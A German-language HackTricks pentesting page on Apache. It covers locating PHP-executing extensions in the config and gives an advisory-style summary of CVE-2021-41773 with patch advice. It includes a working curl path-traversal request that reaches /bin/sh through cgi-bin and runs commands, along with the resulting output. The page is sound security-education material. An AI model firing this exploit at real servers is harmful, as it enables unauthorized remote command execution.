4.1 KiB
Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!
Andere Möglichkeiten, HackTricks zu unterstützen:
- Wenn Sie Ihr Unternehmen in HackTricks bewerben möchten oder HackTricks als PDF herunterladen möchten, überprüfen Sie die ABONNEMENTPLÄNE!
- Holen Sie sich das offizielle PEASS & HackTricks-Merchandise
- Entdecken Sie The PEASS Family, unsere Sammlung exklusiver NFTs
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @carlospolopm.
- Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repositories senden.
Ausführbare PHP-Erweiterungen
Überprüfen Sie, welche Erweiterungen der Apache-Server ausführt. Um sie zu suchen, können Sie Folgendes ausführen:
grep -R -B1 "httpd-php" /etc/apache2
Auch einige Orte, an denen Sie diese Konfiguration finden können, sind:
/etc/apache2/mods-available/php5.conf
/etc/apache2/mods-enabled/php5.conf
/etc/apache2/mods-available/php7.3.conf
/etc/apache2/mods-enabled/php7.3.conf
CVE-2021-41773
Beschreibung
CVE-2021-41773 ist eine Sicherheitslücke in Apache HTTP Server, die es einem Angreifer ermöglicht, Dateien außerhalb des Web-Verzeichnisses öffentlich zugänglich zu machen. Dies kann zu unbefugtem Zugriff auf sensible Informationen führen.
Auswirkungen
Ein Angreifer kann diese Schwachstelle ausnutzen, um auf Dateien zuzugreifen, die normalerweise nicht öffentlich zugänglich sind. Dies kann vertrauliche Informationen wie Konfigurationsdateien, Passwörter oder andere sensible Daten offenlegen.
Empfohlene Maßnahmen
Es wird dringend empfohlen, die betroffene Version des Apache HTTP Servers zu aktualisieren und die neuesten Sicherheitspatches zu installieren. Darüber hinaus sollten Zugriffsbeschränkungen und Berechtigungen für Dateien und Verzeichnisse sorgfältig überprüft werden, um sicherzustellen, dass sensible Informationen nicht öffentlich zugänglich sind.
Weitere Informationen
Weitere Informationen zu CVE-2021-41773 finden Sie in der offiziellen CVE-Datenbank: CVE-2021-41773
curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Linux
Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!
Andere Möglichkeiten, HackTricks zu unterstützen:
- Wenn Sie Ihr Unternehmen in HackTricks bewerben möchten oder HackTricks als PDF herunterladen möchten, überprüfen Sie die ABONNEMENTPLÄNE!
- Holen Sie sich das offizielle PEASS & HackTricks-Merchandise
- Entdecken Sie The PEASS Family, unsere Sammlung exklusiver NFTs
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @carlospolopm.
- Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repositories senden.